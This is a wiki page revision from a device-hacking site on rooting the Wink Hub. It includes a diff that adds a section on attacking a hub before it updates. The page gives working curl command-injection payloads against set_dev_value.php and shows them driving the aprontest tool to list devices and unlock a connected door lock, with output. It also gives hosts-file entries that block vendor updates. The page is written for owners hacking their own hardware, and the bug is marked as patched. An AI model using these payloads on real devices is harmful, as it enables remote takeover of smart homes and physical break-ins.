Difference between revisions of "Wink Hub​​"

From Exploitee.rs
Jump to navigationJump to search
Line 35: Line 35:


== set_dev_value.php Command Execution ==
== set_dev_value.php Command Execution ==
*'''THIS IS FIXED BY OTA AS OF 8/19/2014'''
The Wink Hub runs a web server and within the server has a script that allows for remote command execution. This php code for this script can be seen in the photo below.
The Wink Hub runs a web server and within the server has a script that allows for remote command execution. This php code for this script can be seen in the photo below.


Line 43: Line 45:
'''Example:'''
'''Example:'''
<pre>curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;COMMAND-HERE;"</pre>
<pre>curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;COMMAND-HERE;"</pre>
== Hacking a Newly Purchased Wink Hub ==
This must be done on a Wink Hub prior to it taking its first round of updates (which patches the "set_dev_value" bug detailed above.)
To hack a newly purchased Wink Hub you'll first want to attack the device prior to connecting it to the internet. This can be done by leveraging the AP the device puts up for its initial configuration.
# Power on a newly purchased (and non configured) Wink Hub.
# On your PC look for a network with an SSID with the prefix of "WINKHUB-".
# Connect to the "WINKHUB-" network.
# Setup a static IP on your computer with any "192.168.0.*" address (other than "192.168.0.1").
# Your Wink Hub will have the 192.168.0.1 address and you can now follow the steps in the "set_dev_value.php Command Execution" section.
* If you are planning on using your WinkHub without patching for HW hacking or any other personal use you will want to disable communication with the Wink Hub servers by adding the following to your /etc/hosts file.
<pre>
127.0.0.1      hub-api.winkapp.com
127.0.0.1      hub-updates.winkapp.com
127.0.0.1      wink-hub-images.s3.amazonaws.com
</pre>


== Accessing Peripherals ==
== Accessing Peripherals ==

Revision as of 06:23, 19 August 2014

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

WinkHub.jpg

This page will be dedicated to a general overview, descriptions, and information related to the Wink Hub.

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Wink Hub at Amazon

Disassembly

UART

The pin-out for UART can be found on the image below.

set_dev_value.php Command Execution

  • THIS IS FIXED BY OTA AS OF 8/19/2014

The Wink Hub runs a web server and within the server has a script that allows for remote command execution. This php code for this script can be seen in the photo below.

source code of /set_dev_value.php vulnerability

As you can see the "nodeId" and "attrId" values are used in the sudo command string that is created and then used in the php "passthru()" call. This allows us to execute commands by simply posting a command as either a "nodeId" or "attrId" using any shell command formats (";;", "$()", "|", "``").

Example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;COMMAND-HERE;"

Hacking a Newly Purchased Wink Hub

This must be done on a Wink Hub prior to it taking its first round of updates (which patches the "set_dev_value" bug detailed above.)

To hack a newly purchased Wink Hub you'll first want to attack the device prior to connecting it to the internet. This can be done by leveraging the AP the device puts up for its initial configuration.

  1. Power on a newly purchased (and non configured) Wink Hub.
  2. On your PC look for a network with an SSID with the prefix of "WINKHUB-".
  3. Connect to the "WINKHUB-" network.
  4. Setup a static IP on your computer with any "192.168.0.*" address (other than "192.168.0.1").
  5. Your Wink Hub will have the 192.168.0.1 address and you can now follow the steps in the "set_dev_value.php Command Execution" section.
  • If you are planning on using your WinkHub without patching for HW hacking or any other personal use you will want to disable communication with the Wink Hub servers by adding the following to your /etc/hosts file.
127.0.0.1       hub-api.winkapp.com
127.0.0.1       hub-updates.winkapp.com
127.0.0.1       wink-hub-images.s3.amazonaws.com

Accessing Peripherals

Accessing peripherals attached to the device can be accomplished using the "/usr/sbin/aprontest" binary.

This binary is capable of listing all the attached peripherals as well as the peripheral states and state types.

For example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -l;"
Found 1 devices in database...
MASTERID |     INTERCONNECT |                         USERNAME
       1 |            ZWAVE |      New SECURE_KEYPAD_DOOR_LOCK

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -l;"
Generic/Specific device types: 0x40/0x03
Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044
Device has 1 attributes...
New SECURE_KEYPAD_DOOR_LOCK
ATTRIBUTE |               DESCRIPTION |   TYPE | MODE |          GET |          SET
       10 |               Lock_Unlock |   BOOL |  R/W |         TRUE |         TRUE

Above you can see us querying the WinkHub from the bug within the "set_dev_value" PHP script to list the attached devices. We then use the "MASTERID" in the second query to find out exactly how to communicate with the attached peripheral.

Using the same "aprontest" binary, we can then manipulate the state of the attached device.

For example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -t 10 -u -v FALSE;"
Update device with master ID 1, setting value FALSE
Update callback: Status 0 on updating master ID: 1

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -l;"
Generic/Specific device types: 0x40/0x03
Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044
Device has 1 attributes...
New SECURE_KEYPAD_DOOR_LOCK
ATTRIBUTE |               DESCRIPTION |   TYPE | MODE |          GET |          SET
       10 |               Lock_Unlock |   BOOL |  R/W |        FALSE |        FALSE

The above example first sets the Lock_Unlock state to "FALSE" which unlocks the door lock. Then we query the device status again and confirm it is now "FALSE"

Demo

aprontest Syntax

Usage: aprontest [OPTION]...
Send commands and list information about connected devices

Operations:
  -a		Add a new home automation device
  -n		Manually add a home automation device to the database only.  USE WITH CAUTION.
		Only supports zigbee at this time.
  -d		Delete a home automation device
  -f		Force delete a home automation device from the database only.  USE WITH CAUTION.
		Only supports zigbee at this time.
  -u		Update the state of a home automation device with a new value
  -e		Force a refresh of a home automation device
  -g		Set a generic callback for a radio for one minute of radio
		testing
  -l		List general information about automation devices, or specific
		information about one device
  --set-name	Set user-readable name for a device

Other Options:
  -r <radio>	Specify a radio for an Add Device or Generic Callback operation.
		One of lutron, zwave, zigbee, kidde
  -m <id>	Specify a master device ID for a Delete, Update, Refresh, or
		List operation
  -t <id>	Specify an attribute ID for an Update operation
  -v <value>	Specify a new value to set for an Update operation

Kidde Specific Operations:
  -k <ID>	Set Kidde system ID

Z-Wave Specific Operations:
  --zwave_controller_reset	Reset the zwave controller. USE WITH CAUTION.
				Existing z-wave network will be lost.
  --zwave_remove_failed		Remove a failed zwave device. 
  --zwave_replace_failed	Replace a failed zwave device.
  --zwave_learn_mode		Enter Learn Mode on the Zwave Controller.
  --zwave_controller_shift	Hand off control to another (new) Zwave controller.
  --zwave_exclusion_mode	Enter Exclusion Mode on the Zwave Controller.

Lutron Specific Operations:
  --lutron_pico_add <dimmerMasterId>	Add dimmerMasterId to the control list for the pico controller with masterId set via -m
  --lutron_pico_del <dimmerMasterId>	Delete dimmerMasterId from the control list for the pico controller with masterId set via -m

Fixing "set_dev_value.php" Bug

This script isn't actually used for anything and can be removed or moved. This can be done by using the original bug to remove the script for which the bug is contained.

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;mv /var/www/set_dev_value.php /var/www/set_dev_value.php.txt;"